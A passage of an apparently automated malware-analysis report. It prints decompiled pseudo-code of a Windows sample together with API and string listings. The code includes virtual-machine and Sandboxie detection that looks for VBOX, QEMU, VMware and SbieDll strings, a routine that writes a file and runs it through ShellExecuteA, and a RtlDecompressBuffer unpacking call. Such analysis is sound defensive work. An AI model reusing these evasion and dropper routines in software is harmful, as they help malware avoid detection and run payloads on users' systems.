        				intOrPtr _t157;
        				intOrPtr _t160;
        				CHAR** _t162;
        				void* _t163;
        				intOrPtr _t166;
        				CHAR* _t197;
        				signed int _t199;
        				signed int _t202;
        				signed int _t207;
        				signed int _t212;
        				intOrPtr _t218;
        				signed int _t219;
        				char* _t222;
        				signed int _t231;
        				CHAR* _t256;
        				void* _t266;
        				CHAR* _t267;
        				void* _t270;
        				intOrPtr _t273;
        				void* _t276;
        				void* _t282;
        				void* _t292;
        
        				_push(0xffffffff);
        				_push(E00402786);
        				 *[fs:0x0] = _t273;
        				_t110 = E00402550(0x3f08, __ecx,  *[fs:0x0]);
        				_push(0x104);
        				L004024E8();
        				 *_t110 =  *_a16140;
        				_t111 = lstrcatA("\\\\.\\", _t110);
        				_a4076 = 0;
        				memset( &_a4077, 0, 0xff << 2);
        				asm("stosw");
        				asm("stosb");
        				_a5100 = 0;
        				memset( &_a5101, 0, 0xff << 2);
        				_t276 = _t273 + 0x1c;
        				asm("stosw");
        				asm("stosb");
        				_t270 = CreateFileA(_t111, 0, 1, 0, 3, 0, 0);
        				_a32 = _t270;
        				if(_t270 == 0xffffffff) {
        					L24:
        					_t117 = 0;
        					L25:
        					 *[fs:0x0] = _a16124;
        					return _t117;
        				}
        				_a6124 = 0;
        				memset( &_a6125, 0, 0x9c3 << 2);
        				_t276 = _t276 + 0xc;
        				asm("stosw");
        				asm("stosb");
        				_a40 = 0;
        				_a44 = 0;
        				_a48 = 0;
        				_a28 = 0;
        				_a40 = 0;
        				_a44 = 0;
        				if(DeviceIoControl(_t270, 0x2d1400,  &_a40, 0xc,  &_a6124, 0x2710,  &_a28, 0) == 0) {
        					L23:
        					CloseHandle(_t270);
        					goto L24;
        				}
        				_a76 = 0;
        				memset( &_a77, 0, 0xf9 << 2);
        				asm("stosw");
        				asm("stosb");
        				_a1076 = 0;
        				memset( &_a1077, 0, 0xf9 << 2);
        				asm("stosw");
        				asm("stosb");
        				_a2076 = 0;
        				memset( &_a2077, 0, 0xf9 << 2);
        				asm("stosw");
        				asm("stosb");
        				_a3076 = 0;
        				memset( &_a3077, 0, 0xf9 << 2);
        				asm("stosw");
        				asm("stosb");
        				_push( &_a2076);
        				_push(0);
        				_push(_a6136);
        				_push( &_a6124);
        				E00401780();
        				_push( &_a1076);
        				_push(0);
        				_push(_a6140);
        				_push( &_a6124);
        				E00401780();
        				_push( &_a3076);
        				_push(0);
        				_push(_a6144);
        				_push( &_a6124);
        				E00401780();
        				_t197 =  &_a76;
        				_push(_t197);
        				_push(1);
        				_push(_a6148);
        				_push( &_a6124);
        				E00401780();
        				_t140 = _a4076;
        				_t282 = _t276 + 0x70;
        				if(_t140 != 0) {
        					L6:
        					asm("repne scasb");
        					_t199 =  !(_t197 | 0xffffffff);
        					_a52 = "VBOX";
        					_t266 =  &_a1076 - _t199;
        					_t256 =  &_a2076;
        					_t231 = _t199;
        					_a36 = _t256;
        					_a56 = "VMLOG";
        					asm("repne scasb");
        					_t202 = _t231 >> 2;
        					memcpy(_t256 - 1, _t266, _t202 << 2);
        					_a60 = "QEMU HARDDISK";
        					_a64 = "VMWARE";
        					_a68 = "VIRTUAL";
        					_a72 = 0;
        					_t144 = memcpy(_t266 + _t202 + _t202, _t266, _t231 & 0x00000003);
        					_t276 = _t282 + 0x18;
        					if("VBOX" != 0) {
        						_t207 =  &_a52;
        						_t267 = _t144;
        						_a8 = _t207;
        						do {
        							_t145 = CharUpperA(_a36);
        							_a12 = _v9;
        							_a16 = 0;
        							_a20 = 0;
        							_a24 = 0;
        							asm("repne scasb");
        							_push( !(_t207 | 0xffffffff) - 1);
        							E00401E11( &_a12, _t145);
        							_a16124 = 0;
        							_t149 = CharUpperA(_t267);
        							_t212 = _v17;
        							_v16 = _t212;
        							_v12 = 0;
        							_v8 = 0;
        							_v4 = 0;
        							asm("repne scasb");
        							_push( !(_t212 | 0xffffffff) - 1);
        							E00401E11( &_v16, _t149);
        							_t152 = _v20;
        							_a16116 = 1;
        							if(_v20 == 0) {
        								_t152 = 0x403144;
        							}
        							_t292 = E00401D58( &_a4, _t152, 0, _v8) -  *0x403140; // 0xffffffff
        							if(_t292 != 0) {
        								_t218 = _v12;
        								if(_t218 != 0) {
        									_t157 =  *((intOrPtr*)(_t218 - 1));
        									if(_t157 == 0 || _t157 == 0xff) {
        										E00402020(_t157, _t218 - 1);
        										_t276 = _t276 + 4;
        									} else {
        										 *((char*)(_t218 - 1)) = _t157 - 1;
        									}
        								}
        								_t219 = _a8;
        								_v12 = 0;
        								_v8 = 0;
        								_v4 = 0;
        								if(_t219 == 0) {
        									L36:
        									_t117 = 1;
        									goto L25;
        								} else {
        									_t154 =  *((intOrPtr*)(_t219 - 1));
        									if(_t154 == 0 || _t154 == 0xff) {
        										E00402020(_t154, _t219 - 1);
        										_t276 = _t276 + 4;
        										goto L36;
        									} else {
        										 *((char*)(_t219 - 1)) = _t154 - 1;
        										_t117 = 1;
        										goto L25;
        									}
        								}
        							}
        							_t160 = _v12;
        							if(_t160 != 0) {
        								_t222 = _t160 - 1;
        								_t166 =  *((intOrPtr*)(_t160 - 1));
        								if(_t166 == 0 || _t166 == 0xff) {
        									E00402020(_t166, _t222);
        									_t276 = _t276 + 4;
        								} else {
        									 *_t222 = _t166 - 1;
        								}
        							}
        							_t207 = _a8;
        							_v12 = 0;
        							_v8 = 0;
        							_v4 = 0;
        							_a16124 = 0xffffffff;
        							if(_t207 != 0) {
        								_t163 =  *(_t207 - 1);
        								if(_t163 == 0 || _t163 == 0xff) {
        									_t207 = _t207 - 1;
        									E00402020(_t163, _t207);
        									_t276 = _t276 + 4;
        								} else {
        									 *(_t207 - 1) = _t163 - 1;
        								}
        							}
        							_a8 = 0;
        							_t162 =  &(_v0[1]);
        							_a12 = 0;
        							_a16 = 0;
        							_v0 = _t162;
        							_t267 =  *_t162;
        						} while (_t267 != 0);
        						_t270 = _a24;
        					}
        					goto L23;
        				}
        				_t197 = _a76;
        				_push(_t197);
        				L0040253E();
        				_t282 = _t282 + 4;
        				if(_t140 != 0) {
        					L5:
        					_t197 =  &_a4076;
        					lstrcpyA(_t197,  &_a76);
        					lstrcpyA( &_a5100,  &_a1076);
        					goto L6;
        				}
        				_push(_a95);
        				L0040253E();
        				_t282 = _t282 + 4;
        				if(_t140 == 0) {
        					goto L6;
        				}
        				goto L5;
        			}

        APIs
        • ??2@YAPAXI@Z.MSVCRT ref: 00401918
        • lstrcatA.KERNEL32(\\.\,00000000,00000000), ref: 00401933
        • CreateFileA.KERNEL32(00000000,00000000,00000001,00000000,00000003,00000000,00000000), ref: 0040197A
        • DeviceIoControl.KERNEL32 ref: 004019E3
        • CloseHandle.KERNEL32(00000000), ref: 00401CC7
          • Part of subcall function 00401780: tolower.MSVCRT ref: 004017BC
          • Part of subcall function 00401780: isspace.MSVCRT ref: 004017C7
          • Part of subcall function 00401780: isprint.MSVCRT ref: 0040181D
          • Part of subcall function 00401780: isprint.MSVCRT ref: 0040184A
          • Part of subcall function 00401780: isspace.MSVCRT ref: 0040189E
        • isalnum.MSVCRT ref: 00401AE0
        • isalnum.MSVCRT ref: 00401AF2
        • lstrcpyA.KERNEL32(?,?), ref: 00401B11
        • lstrcpyA.KERNEL32(?,?), ref: 00401B23
        • CharUpperA.USER32(?), ref: 00401BAA
        • CharUpperA.USER32(VBOX,00000000), ref: 00401BE1
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CharUpperisalnumisprintisspacelstrcpy$??2@CloseControlCreateDeviceFileHandlelstrcattolower
        • String ID: QEMU HARDDISK$VBOX$VIRTUAL$VMLOG$VMWARE$\\.\$pA@
        • API String ID: 1627761574-3870764142
        • Opcode ID: 33faca869b1228ff1db31fe669dc65e4cebe09eedcf4918cc4a248543a3d5d0c
        • Instruction ID: f7bbc1d95ebeef848e1b9314e67cabb8d9d8d46cba94e09741ee6c638e1bbe28
        • Opcode Fuzzy Hash: 33faca869b1228ff1db31fe669dc65e4cebe09eedcf4918cc4a248543a3d5d0c
        • Instruction Fuzzy Hash: FDC1C4B15483809FD321DF28C884AABBBE5FBC8344F04493EF58597391DB799909CB5A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 86%
        			E004011C7(char* _a4, void* _a8, long _a12, int _a16, long _a20) {
        				void* _v8;
        				void _v267;
        				char _v268;
        				void* _t26;
        				void* _t34;
        				signed int _t36;
        
        				_t36 = 0x40;
        				_v268 = 0;
        				memset( &_v267, 0, _t36 << 2);
        				asm("stosw");
        				asm("stosb");
        				PathCombineA( &_v268, _a4, _a20);
        				SetFileAttributesA( &_v268, 0x80);
        				_t26 = CreateFileA( &_v268, 0xc0000000, 0, 0, 2, 2, 0);
        				_v8 = _t26;
        				if(_t26 != 0xffffffff) {
        					_a20 = 0;
        					WriteFile(_t26, _a8, _a12,  &_a20, 0);
        					CloseHandle(_v8);
        					SetFileAttributesA( &_v268, 0x80);
        					ShellExecuteA(0, "open",  &_v268, 0, _a4, _a16);
        					return 0;
        				}
        				_t34 = 1;
        				return _t34;
        			}

        APIs
        • PathCombineA.SHLWAPI(?,?,?,00000000,0000000A,00000000), ref: 004011F8
        • SetFileAttributesA.KERNEL32(?,00000080), ref: 00401211
        • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000002,00000000), ref: 00401226
        • WriteFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00401248
        • CloseHandle.KERNEL32(00000000), ref: 00401251
        • SetFileAttributesA.KERNEL32(?,00000080), ref: 0040125F
        • ShellExecuteA.SHELL32(00000000,open,?,00000000,?,00000000), ref: 00401275
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$Attributes$CloseCombineCreateExecuteHandlePathShellWrite
        • String ID: open
        • API String ID: 1472231245-2758837156
        • Opcode ID: d01971f85050b2bd80bd06c3548902baed33adc4ebeccf73ed0968f4278b9edc
        • Instruction ID: b4015b20fa4fca804e27d42f60213ba64d5324a88e2f1d86366d15d87e0c8716
        • Opcode Fuzzy Hash: d01971f85050b2bd80bd06c3548902baed33adc4ebeccf73ed0968f4278b9edc
        • Instruction Fuzzy Hash: 8C117F7690411CBFDF209FA4DC49FDB7F3CEB58355F1044A6B644B6090DAB09A94CBA4
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • GetModuleHandleA.KERNEL32(SbieDll.dll,00000000,00401468,?,00000000,?,?,00000000), ref: 00401FBC
        • GetModuleHandleA.KERNEL32(cwmonitor,?,?,00000000), ref: 00401FC7
          • Part of subcall function 004018F0: ??2@YAPAXI@Z.MSVCRT ref: 00401918
          • Part of subcall function 004018F0: lstrcatA.KERNEL32(\\.\,00000000,00000000), ref: 00401933
          • Part of subcall function 004018F0: CreateFileA.KERNEL32(00000000,00000000,00000001,00000000,00000003,00000000,00000000), ref: 0040197A
          • Part of subcall function 004018F0: DeviceIoControl.KERNEL32 ref: 004019E3
        • GetCurrentProcess.KERNEL32(?), ref: 00401FF8
        • GetExitCodeProcess.KERNEL32 ref: 00401FFF
        • ExitProcess.KERNEL32 ref: 0040200A
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Process$ExitHandleModule$??2@CodeControlCreateCurrentDeviceFilelstrcat
        • String ID: SbieDll.dll$cwmonitor
        • API String ID: 2873962589-660256926
        • Opcode ID: a28dba3c993dac8c11d89181751d8fa46ed5160c231e9f978fffd031d7e6ce52
        • Instruction ID: d36f33c544cb0304d64de2c0d66ad9c24a886837219df4edc0b74a4667214583
        • Opcode Fuzzy Hash: a28dba3c993dac8c11d89181751d8fa46ed5160c231e9f978fffd031d7e6ce52
        • Instruction Fuzzy Hash: B0F0B471205301AFD7109BB19D08B1B7B9D9F98350F00883AF905F3294E638D5408B6A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 75%
        			E0040202B(void* __eflags) {
        				intOrPtr* _t38;
        				void* _t47;
        				intOrPtr* _t48;
        				void* _t50;
        
        				L00402586();
        				 *((char*)(_t50 - 0x20)) =  *((intOrPtr*)(_t50 - 0xd));
        				E00401DD5(_t50 - 0x20, 0);
        				_push(strlen("string too long"));
        				E00401E11(_t50 - 0x20, "string too long");
        				 *(_t50 - 4) =  *(_t50 - 4) & 0x00000000;
        				_push(_t50 - 0x20);
        				_t8 = _t50 - 0x3c; // 0x7742ff34
        				_t38 = _t8;
        				L1();
        				_t9 = _t50 - 0x3c; // 0x7742ff34
        				_push(0x403408);
        				 *((intOrPtr*)(_t50 - 0x3c)) = 0x40314c;
        				L00402718();
        				_t47 = _t9;
        				L00402586();
        				_push(_t38);
        				_push(_t38);
        				_push(_t47);
        				_t11 = _t50 - 0x10; // 0x7742ff60
        				_t48 = _t38;
        				 *((intOrPtr*)(_t50 - 0x14)) = _t48;
        				 *((intOrPtr*)(_t50 - 0x10)) = 0x403178;
        				L00402724();
        				 *(_t50 - 4) =  *(_t50 - 4) & 0x00000000;
        				 *((char*)(_t48 + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t50 + 8))));
        				E00401DD5(_t48 + 0xc, 0);
        				E0040233F(_t48 + 0xc,  *((intOrPtr*)(_t50 + 8)), 0,  *0x403140);
        				 *_t48 = "P!@";
        				 *[fs:0x0] =  *((intOrPtr*)(_t50 - 0xc));
        				return _t48;
        			}

        APIs
        • _EH_prolog.MSVCRT ref: 00402030
        • strlen.MSVCRT ref: 0040204F
          • Part of subcall function 00402085: _EH_prolog.MSVCRT ref: 0040208A
          • Part of subcall function 00402085: ??0exception@@QAE@ABQBD@Z.MSVCRT(7742FF60), ref: 004020A4
        • _CxxThrowException.MSVCRT(7742FF34,00403408), ref: 0040207F
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: H_prolog$??0exception@@ExceptionThrowstrlen
        • String ID: #"@$string too long
        • API String ID: 4056035191-3599617215
        • Opcode ID: e60be865f8ec7b7ae14d07182f2a0b6904e8344d65be8e5466d0567450979c3b
        • Instruction ID: 0549bc370ae89a891f7e020882ed10ef815c1ceddb4a43e9484f7fb274972932
        • Opcode Fuzzy Hash: e60be865f8ec7b7ae14d07182f2a0b6904e8344d65be8e5466d0567450979c3b
        • Instruction Fuzzy Hash: F9F03A32C01118BADB04FBA5DD4AADD7B7CAF18315F00402AF500760D2DBBC16088BAA
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 68%
        			E00401000(void* __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
        				signed int _v8;
        				_Unknown_base(*)()* _t10;
        				void* _t15;
        				void* _t16;
        				intOrPtr* _t18;
        
        				L004024E8();
        				_v8 = _v8 & 0x00000000;
        				_t16 = __eax;
        				 *_t18 = "Ntdll.dll";
        				_t10 = GetProcAddress(GetModuleHandleA(_a12), "RtlDecompressBuffer");
        				 *_t10(0x102, _t16, _a12, _a4, _a8,  &_v8, _t15, __ecx);
        				return _t16;
        			}









        APIs
        • ??2@YAPAXI@Z.MSVCRT ref: 00401008
        • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,00401548,004026C0,0000000A,00000000), ref: 0040101A
        • GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 00401026
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: ??2@AddressHandleModuleProc
        • String ID: Ntdll.dll$RtlDecompressBuffer
        • API String ID: 249543258-662685767
        • Opcode ID: 3dca89544e95365f7c93d4f47a82e50c426048ecd1685e33f384c8bc7426d852
        • Instruction ID: 60d32bc2359c1cf861c5b92dec8c4ac14946f991e5bf7565adabb2dee558510e
        • Opcode Fuzzy Hash: 3dca89544e95365f7c93d4f47a82e50c426048ecd1685e33f384c8bc7426d852
        • Instruction Fuzzy Hash: 39E06D72501218BFCF005FD4DD09EDE7E6CEB04352F004028F704A20D0D6B59A10DBA4
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 93%
        			E00401780() {
        				intOrPtr _t28;
        				signed int _t29;
        				void* _t30;
        				intOrPtr _t32;
        				signed int _t34;
        				char* _t36;
        				void* _t37;
        				signed int _t40;
        				signed int _t43;
        				signed int _t44;
        				void* _t46;
        				signed char _t47;
        				char _t49;
        				void* _t55;
        				signed int _t59;
        				signed int _t62;
        				signed int _t63;
        				intOrPtr* _t65;
        				signed int _t67;
        				signed int _t68;
        				void* _t71;
        
        				_t28 =  *((intOrPtr*)(_t71 + 8));
        				_t65 =  *((intOrPtr*)(_t71 + 0x14));
        				 *_t65 = 0;
        				if(_t28 > 0) {
        					_push(_t43);
        					_t62 = 0;
        					_t29 = _t28 +  *((intOrPtr*)(_t71 + 8));
        					 *((char*)(_t71 + 0x20)) = 0;
        					 *_t65 = 0;
        					 *(_t71 + 0x18) = _t29;
        					_t67 = _t29;
        					while(1) {
        						_t30 =  *_t67;
        						if(_t30 == 0) {
        							break;
        						}
        						_push(_t30);
        						L00402538();
        						_t46 = _t30;
        						_t37 = _t46;
        						_push(_t37);
        						L00402532();
        						_t71 = _t71 + 8;
        						if(_t37 != 0) {
        							_t46 = 0x30;
        						}
        						_t59 =  *(_t62 + _t65) << 4;
        						 *((char*)(_t71 + 0x20)) =  *((intOrPtr*)(_t71 + 0x20)) + 1;
        						 *(_t62 + _t65) = _t59;
        						_t40 = _t59;
        						if(_t46 < 0x30 || _t46 > 0x39) {
        							if(_t46 < 0x61 || _t46 > 0x66) {
        								goto L17;
        							} else {
        								_t47 = _t46 - 0x57;
        								goto L12;
        							}
        						} else {
        							_t47 = _t46 - 0x30;
        							L12:
        							_t43 = _t47 | _t40;
        							 *(_t62 + _t65) = _t43;
        							if( *((intOrPtr*)(_t71 + 0x20)) != 2) {
        								L16:
        								_t67 = _t67 + 1;
        								continue;
        							} else {
        								_t40 = _t43;
        								if(_t40 == 0) {
        									L15:
        									_t62 = _t62 + 1;
        									 *((char*)(_t71 + 0x20)) = 0;
        									 *(_t62 + _t65) = 0;
        									goto L16;
        								} else {
        									_push(_t40);
        									L0040252C();
        									_t71 = _t71 + 4;
        									if(_t40 == 0) {
        										L17:
        										_t67 =  *(_t71 + 0x18);
        										_t62 = 0;
        										while(1) {
        											_t43 =  *_t67;
        											if(_t43 == 0) {
        												goto L22;
        											}
        											_push(_t43);
        											L0040252C();
        											_t71 = _t71 + 4;
        											if(_t40 == 0) {
        												_t62 = 0;
        											} else {
        												 *(_t62 + _t65) = _t43;
        												_t62 = _t62 + 1;
        												_t67 = _t67 + 1;
        												continue;
        											}
        											goto L22;
        										}
        									} else {
        										goto L15;
        									}
        								}
        							}
        						}
        						break;
        					}
        					L22:
        					 *(_t62 + _t65) = 0;
        					if( *((intOrPtr*)(_t71 + 0x1c)) != 0 && _t62 > 0) {
        						_t18 = _t65 + 1; // 0x74b04de1
        						_t36 = _t18;
        						_t67 = (_t67 | 0xffffffff) - _t65;
        						do {
        							 *((char*)(_t36 - 1)) =  *_t36;
        							 *_t36 =  *((intOrPtr*)(_t36 - 1));
        							_t36 = _t36 + 2;
        						} while (_t36 + _t67 < _t62);
        					}
        					_t32 =  *_t65;
        					_t68 = _t67 | 0xffffffff;
        					_t44 = _t43 | 0xffffffff;
        					_t63 = 0;
        					if(_t32 != 0) {
        						do {
        							_push( *((char*)(_t63 + _t65)));
        							L00402532();
        							_t71 = _t71 + 4;
        							if(_t32 == 0) {
        								if(_t44 < 0) {
        									_t44 = _t63;
        								}
        								_t68 = _t63;
        							}
        							_t32 =  *((intOrPtr*)(_t63 + _t65 + 1));
        							_t63 = _t63 + 1;
        						} while (_t32 != 0);
        						if(_t44 >= 0 && _t68 >= 0) {
        							_t34 = _t44;
        							if(_t44 <= _t68) {
        								while(1) {
        									_t49 =  *((intOrPtr*)(_t34 + _t65));
        									if(_t49 == 0) {
        										goto L37;
        									}
        									_t55 = _t34 - _t44;
        									_t34 = _t34 + 1;
        									 *((char*)(_t55 + _t65)) = _t49;
        									if(_t34 <= _t68) {
        										continue;
        									}
        									goto L37;
        								}
        							}
        							L37:
        							 *((char*)(_t34 - _t44 + _t65)) = 0;
        						}
        					}
        					return _t65;
        				} else {
        					return _t65;
        				}
        			}

























        APIs
        Memory Dump Source
        • Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: isprint$isspacetolower
        • String ID:
        • API String ID: 2460042518-0
        • Opcode ID: e4abda3298a20bb397b6b220ad2c58c192e12379a4a9e408834b4ba2f888c67d
        • Instruction ID: 82dc739f2192569af9c7a9653aceb93c5fda12627ae8ebc29f7d26932d665028
        • Opcode Fuzzy Hash: e4abda3298a20bb397b6b220ad2c58c192e12379a4a9e408834b4ba2f888c67d
        • Instruction Fuzzy Hash: 844125166087C15DE3116A3D48503A7BBD91F92308F5C417ED8D0A73E3E67ECA09C36A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 82%
        			E00402085(char** __ecx) {
        				void* _t28;
        
        				L00402586();
        				_push(__ecx);
        				_push(__ecx);
        				_t1 = _t28 - 0x10; // 0x7742ff60
        				 *((intOrPtr*)(_t28 - 0x14)) = __ecx;
        				 *((intOrPtr*)(_t28 - 0x10)) = 0x403178;
        				L00402724();
        				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
        				__ecx[3] =  *((intOrPtr*)( *((intOrPtr*)(_t28 + 8))));
        				E00401DD5( &(__ecx[3]), 0);
        				E0040233F( &(__ecx[3]),  *((intOrPtr*)(_t28 + 8)), 0,  *0x403140);
        				 *__ecx = "P!@";
        				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
        				return __ecx;
        			}





        APIs
        • _EH_prolog.MSVCRT ref: 0040208A
        • ??0exception@@QAE@ABQBD@Z.MSVCRT(7742FF60), ref: 004020A4
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: ??0exception@@H_prolog
        • String ID: P!@$string too long
        • API String ID: 131831681-3885184578
        • Opcode ID: 4b332946c1271456af2096fca9a8cc99132634d38232edc61a83a3940f93435c
        • Instruction ID: 5f35b383997495e749a4d8b1929ec4d776141fec34b867eb11734b74fbb16bf0
        • Opcode Fuzzy Hash: 4b332946c1271456af2096fca9a8cc99132634d38232edc61a83a3940f93435c
        • Instruction Fuzzy Hash: 3AF0AF71600210AAC7009F598805BAEBBBCEB88705F00402FE141BB2C1C7F85A048768
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 73%
        			E00402257(void* __eflags) {
        				void* _t27;
        				intOrPtr* _t31;
        				intOrPtr* _t38;
        				void* _t40;
        
        				L00402586();
        				 *((char*)(_t40 - 0x20)) =  *((intOrPtr*)(_t40 - 0xd));
        				E00401DD5(_t40 - 0x20, 0);
        				_push(strlen("invalid string position"));
        				E00401E11(_t40 - 0x20, "invalid string position");
        				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
        				_t31 = _t40 - 0x3c;
        				E00402085(_t31, _t40 - 0x20);
        				_push(0x403530);
        				_push(_t40 - 0x3c);
        				 *((intOrPtr*)(_t40 - 0x3c)) = 0x403180;
        				L00402718();
        				_pop(_t37);
        				L00402586();
        				_push(_t31);
        				_t38 = _t31;
        				 *((intOrPtr*)(_t40 - 0x10)) = _t38;
        				 *_t38 = "P!@";
        				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
        				_t27 = E00401DD5(_t38 + 0xc, 1);
        				 *(_t40 - 4) =  *(_t40 - 4) | 0xffffffff;
        				L0040271E();
        				 *[fs:0x0] =  *((intOrPtr*)(_t40 - 0xc));
        				return _t27;
        			}








        APIs
        • _EH_prolog.MSVCRT ref: 0040225C
        • strlen.MSVCRT ref: 0040227B
          • Part of subcall function 00402085: _EH_prolog.MSVCRT ref: 0040208A
          • Part of subcall function 00402085: ??0exception@@QAE@ABQBD@Z.MSVCRT(7742FF60), ref: 004020A4
        • _CxxThrowException.MSVCRT(00000000,00403530), ref: 004022AB
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: H_prolog$??0exception@@ExceptionThrowstrlen
        • String ID: invalid string position
        • API String ID: 4056035191-1799206989
        • Opcode ID: 45caeee324ddf7c98e276f4bf3aef80acb604a2fd3a0f52ff4bbd872f52993a0
        • Instruction ID: e0d7c25cb8fe0c211b54dec80dfa4da4dbce1340978684376c1bd020f4b95780
        • Opcode Fuzzy Hash: 45caeee324ddf7c98e276f4bf3aef80acb604a2fd3a0f52ff4bbd872f52993a0
        • Instruction Fuzzy Hash: ABF0DA72C11128BADB04FBA5DD49ADEBB7CAF19314F40406AF911760D2DBB856088BB9
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 82%
        			E0040216C(char** __ecx) {
        				intOrPtr _t14;
        				void* _t27;
        
        				L00402586();
        				_push(__ecx);
        				_t14 =  *((intOrPtr*)(_t27 + 8));
        				_push(_t14);
        				 *((intOrPtr*)(_t27 - 0x10)) = __ecx;
        				L004026F0();
        				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;
        				_t22 =  &(__ecx[3]);
        				__ecx[3] =  *((intOrPtr*)(_t14 + 0xc));
        				E00401DD5( &(__ecx[3]), 0);
        				E0040233F(_t22, _t14 + 0xc, 0,  *0x403140);
        				 *__ecx = "P!@";
        				 *[fs:0x0] =  *((intOrPtr*)(_t27 - 0xc));
        				return __ecx;
        			}






        APIs
        • _EH_prolog.MSVCRT ref: 00402171
        • ??0exception@@QAE@ABV0@@Z.MSVCRT(?), ref: 00402183
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: ??0exception@@H_prologV0@@
        • String ID: P!@
        • API String ID: 1023251003-1774101457
        • Opcode ID: 067bbbf1bda4fcc1dc514d3da1c5fb9b9cdb0455a7343cec7235a701fc84b4c5
        • Instruction ID: dc1d397bb556e0cc06bf90b73dd2d5b7152a75cd55362aaf52ba11446872b5bc
        • Opcode Fuzzy Hash: 067bbbf1bda4fcc1dc514d3da1c5fb9b9cdb0455a7343cec7235a701fc84b4c5
        • Instruction Fuzzy Hash: B6F054766002406BC7115F5A9D45B5EFB69EB48755F04442FF545BB2C2C7F8590087A8
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 87%
        			E004021C9(char** __ecx, void* __eflags) {
        				void* _t9;
        				void* _t17;
        
        				L00402586();
        				_push(__ecx);
        				 *((intOrPtr*)(_t17 - 0x10)) = __ecx;
        				 *__ecx = "P!@";
        				 *(_t17 - 4) =  *(_t17 - 4) & 0x00000000;
        				_t9 = E00401DD5( &(__ecx[3]), 1);
        				 *(_t17 - 4) =  *(_t17 - 4) | 0xffffffff;
        				L0040271E();
        				 *[fs:0x0] =  *((intOrPtr*)(_t17 - 0xc));
        				return _t9;
        			}






        APIs
        • _EH_prolog.MSVCRT ref: 004021CE
        • ??1exception@@UAE@XZ.MSVCRT(00000001,?,?,0040222B,?,?,00403408), ref: 004021F4
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: ??1exception@@H_prolog
        • String ID: P!@
        • API String ID: 1656532167-1774101457
        • Opcode ID: bd039a5c8f16ff708a838ebe32cefc55b635277a074061dcfc276d8bcba263e3
        • Instruction ID: 23919f60721e3cb12c069b6fcf3d218434a72c03e79e54153f9ce7871d62e3e5
        • Opcode Fuzzy Hash: bd039a5c8f16ff708a838ebe32cefc55b635277a074061dcfc276d8bcba263e3
        • Instruction Fuzzy Hash: F5E04671910611ABC728AF58D91679DB7B8EF08724F10866FA062B32C0CBF85A008B88
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 87%
        			E00402113(char** __ecx) {
        				void* _t9;
        				void* _t17;
        
        				L00402586();
        				_push(__ecx);
        				 *((intOrPtr*)(_t17 - 0x10)) = __ecx;
        				 *__ecx = "P!@";
        				 *(_t17 - 4) =  *(_t17 - 4) & 0x00000000;
        				_t9 = E00401DD5( &(__ecx[3]), 1);
        				 *(_t17 - 4) =  *(_t17 - 4) | 0xffffffff;
        				L0040271E();
        				 *[fs:0x0] =  *((intOrPtr*)(_t17 - 0xc));
        				return _t9;
        			}






        APIs
        • _EH_prolog.MSVCRT ref: 00402118
        • ??1exception@@UAE@XZ.MSVCRT(00000001,?,?,?,00403478), ref: 0040213E
        Strings
        Memory Dump Source
        • Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: ??1exception@@H_prolog
        • String ID: P!@
        • API String ID: 1656532167-1774101457
        • Opcode ID: 49efff08415b09e85c37c017dd115aa86e2827151ed8a416f4949fd4d95beca8
        • Instruction ID: b617ac85027aa97d32976b97671e7977720099ea72aa1b7bfabbb41d9032c361
        • Opcode Fuzzy Hash: 49efff08415b09e85c37c017dd115aa86e2827151ed8a416f4949fd4d95beca8
        • Instruction Fuzzy Hash: 02E04F71910611ABC724AF58D91579DB7B4EF08724F10866FA062B31C0C7F85A008788
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 87%
